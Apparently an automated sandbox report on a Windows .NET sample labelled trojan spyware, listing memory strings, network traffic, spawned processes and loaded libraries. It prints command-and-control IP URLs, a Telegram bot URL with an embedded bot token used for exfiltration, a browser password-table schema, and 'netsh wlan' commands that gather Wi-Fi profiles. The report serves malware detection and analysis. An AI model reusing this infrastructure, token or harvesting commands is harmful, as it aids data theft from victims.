Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:80802(
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FD5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:80802(
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.60.191.38:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.87.207.180:9090
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%74
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63:80/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.82.65.63:80/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:9000
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:9000/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:9000/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.4.73.118:90002(
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.110.140.182:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.134.71.132:8082
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.219.110.16:9999
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179:80
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179:80/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://95.216.147.179:80/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://101.126.19.171:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://154.9.207.142:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135/2r1j6_user%40358075_report.wsrp
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443/2r1j6_user
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443/2r1j6_user%40358075_report.wsr
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=72591
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCEA000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCEA000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 60240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60237

Source: unknown	HTTPS traffic detected: 5.196.181.135:443 -> 192.168.2.8:60237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60240 version: TLS 1.2

System Summary

.NET source code contains very large strings

Source: 73ybGtnYXx.exe, fz.cs

Long String: Length: 11394

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936ABAEE2	0_2_00007FF936ABAEE2
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AA15E8	0_2_00007FF936AA15E8
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AA2943	0_2_00007FF936AA2943
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AB9A8A	0_2_00007FF936AB9A8A
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AB930D	0_2_00007FF936AB930D
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AA7459	0_2_00007FF936AA7459
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AA6C19	0_2_00007FF936AA6C19

Source: 73ybGtnYXx.exe, 00000000.00000000.843901184.000001B60DEC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSa7fafebc9f48c386e4a3247d7b5735aff07c.exed" vs 73ybGtnYXx.exe
Source: 73ybGtnYXx.exe	Binary or memory string: OriginalFilenameSa7fafebc9f48c386e4a3247d7b5735aff07c.exed" vs 73ybGtnYXx.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/2@3/11

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

File created: C:\Users\user\AppData\Local\ucv4nuoh0h

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Mutant created: \Sessions\1\BaseNamedObjects\m01g4892qu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03

Source: 73ybGtnYXx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 73ybGtnYXx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC91000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC7E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 73ybGtnYXx.exe	Virustotal: Detection: 58%
Source: 73ybGtnYXx.exe	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\73ybGtnYXx.exe "C:\Users\user\Desktop\73ybGtnYXx.exe"
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
